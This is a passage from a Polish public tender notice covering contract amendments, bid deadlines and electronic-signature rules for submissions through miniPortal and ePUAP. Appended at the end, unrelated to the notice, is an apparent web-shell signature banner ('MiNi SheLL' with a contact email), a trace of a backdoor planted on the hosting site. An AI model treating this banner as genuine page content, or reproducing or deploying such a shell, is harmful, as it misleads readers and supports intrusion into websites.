dostarczy urządzenia o parametrach nie gorszych niż opisane w SIWZ,<br/>c.	następstwem okoliczności leżących po stronie Zamawiającego, takich jak: utrudnienia, zawieszenia prac lub przeszkodami dającymi się przypisać Zamawiającemu, <br/>d.	następstwem wprowadzania zmian w obowiązujących przepisach prawnych mających wpływ na realizację przedmiotu zamówienia, <br/>3.	Zmiany przewidziane w Umowie mogą być inicjowane przez Zamawiającego oraz przez Wykonawcę. <br/>4.	Warunkiem dokonania zmian, o których mowa w ust. 2 jest złożenie wniosku przez stronę inicjującą zmianę zawierającego: opis propozycji zmian, uzasadnienie zmian, termin wykonania Umowy. <br/>5.	W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w ust. 2 pkt. 2) termin realizacji dostawy może ulec odpowiedniemu przedłużeniu, nie dłużej jednak niż o okres trwania tych okoliczności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-12 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę wraz z wymaganymi załącznikami za pośrednictwem Formularza do złożenia, zmiany, wycofania oferty lub wniosku dostępnego na ePUAP i udostępnionego również na miniPortalu: https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-12 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-10</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> c.d. informacji z pkt 3.6.) ogłoszenia Wymagania techniczne i organizacyjne dotyczące<br/>korespondencji elektronicznej6) Zamawiający zaleca aby w przypadku podpisywania pliku przez<br/>kilka osób, stosować podpisy tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów<br/>np. osobistym i kwalifikowanym może doprowadzić do problemów w weryfikacji plików, 7)<br/>Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowego wykorzystania wybranej metody podpisania plików oferty, 8) jeśli Wykonawca<br/>pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego ze<br/>skompresowanych plików.11. Zamawiający nie przewiduje sposobu komunikowania się z<br/>Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej, wskazanych<br/>w SWZ.12. W Formularzu Oferty Wykonawca zobowiązany jest podać adres skrzynki ePUAP<br/>oraz poczty elektronicznej poprzez które Zamawiający będzie komunikował się z Wykonawcą.<br/>13. Wykonawca może przed upływem terminu do składania ofert wycofać ofertę za<br/>pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku”. Sposób<br/>wycofania oferty został opisany w „Instrukcji użytkownika systemu miniPortal-ePUAP”. 14.<br/>Zamawiający dopuszcza również możliwość składania dokumentów elektronicznych,<br/>oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń (za wyjątkiem oferty i<br/>załączników do niej) za pomocą poczty elektronicznej, na adres email<br/>zamowienia@nck.krakow.pl

Creat By MiNi SheLL
Email: jattceo@gmail.com